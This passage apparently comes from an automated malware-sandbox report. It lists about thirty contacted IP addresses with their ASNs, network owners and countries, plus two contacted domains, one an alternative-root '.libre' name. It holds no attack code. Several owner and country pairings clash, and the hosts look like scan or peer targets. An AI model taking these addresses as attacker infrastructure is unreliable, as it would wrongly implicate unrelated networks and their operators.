33915 TNF-ASNL false
7.174.70.53
 unknown United States
3356 LEVEL3US false
109.99.50.247
 unknown Romania
9050 RTDBucharestRomaniaRO false
157.26.123.100
 unknown Switzerland
559 SWITCHPeeringrequestspeeringswitchchEU false
71.249.234.63
 unknown United States
701 UUNETUS false
9.80.108.253
 unknown United States
3356 LEVEL3US false
98.215.209.110
 unknown United States
7922 COMCAST-7922US false
86.211.233.70
 unknown France
3215 FranceTelecom-OrangeFR false
94.59.50.20
 unknown United Arab Emirates
5384 EMIRATES-INTERNETEmiratesInternetAE false
89.190.196.89
 unknown Bulgaria
35141 MEGALANBG false
116.106.116.128
 unknown Viet Nam
24086 VIETTEL-AS-VNViettelCorporationVN false
81.245.158.250
 unknown Belgium
5432 PROXIMUS-ISP-ASBE false
208.244.1.197
 unknown United States
4208 THE-ISERV-COMPANYUS false
116.38.145.15
 unknown Korea Republic of
17858 POWERVIS-AS-KRLGPOWERCOMMKR false
215.205.132.4
 unknown United States
721 DNIC-ASBLK-00721-00726US false
172.195.23.117
 unknown Australia
18747 IFX18747US false
14.114.111.151
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
53.165.213.9
 unknown Germany
31399 DAIMLER-ASITIGNGlobalNetworkDE false
51.22.194.116
 unknown United States
2686 ATGS-MMD-ASUS false
115.186.147.26
 unknown Pakistan
23674 NAYATEL-PKNayatelPvtLtdPK false
156.21.66.10
 unknown United States
29975 VODACOM-ZA false
85.40.182.223
 unknown Italy
3269 ASN-IBSNAZIT false
154.98.142.44
 unknown Sudan
36998 SDN-MOBITELSD false
151.209.160.237
 unknown United States
11552 PHOENIX-LIFE-INSURANCE-COMPANYUS false
145.56.192.46
 unknown Netherlands
1103 SURFNET-NLSURFnetTheNetherlandsNL false
14.113.30.178
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
174.51.146.210
 unknown United States
7922 COMCAST-7922US false
43.239.42.184
 unknown China
17506 UCOMARTERIANetworksCorporationJP false
206.213.237.133
 unknown United States
6646 AETNAUS false
151.128.11.196
 unknown United States
45025 EDN-ASUA false
66.226.186.90
 unknown Bahamas
19128 TTNBS false

Contacted Domains

Name IP Active
nineteen.libre 103.253.147.242 true
daisy.ubuntu.com 162.213.35.24 true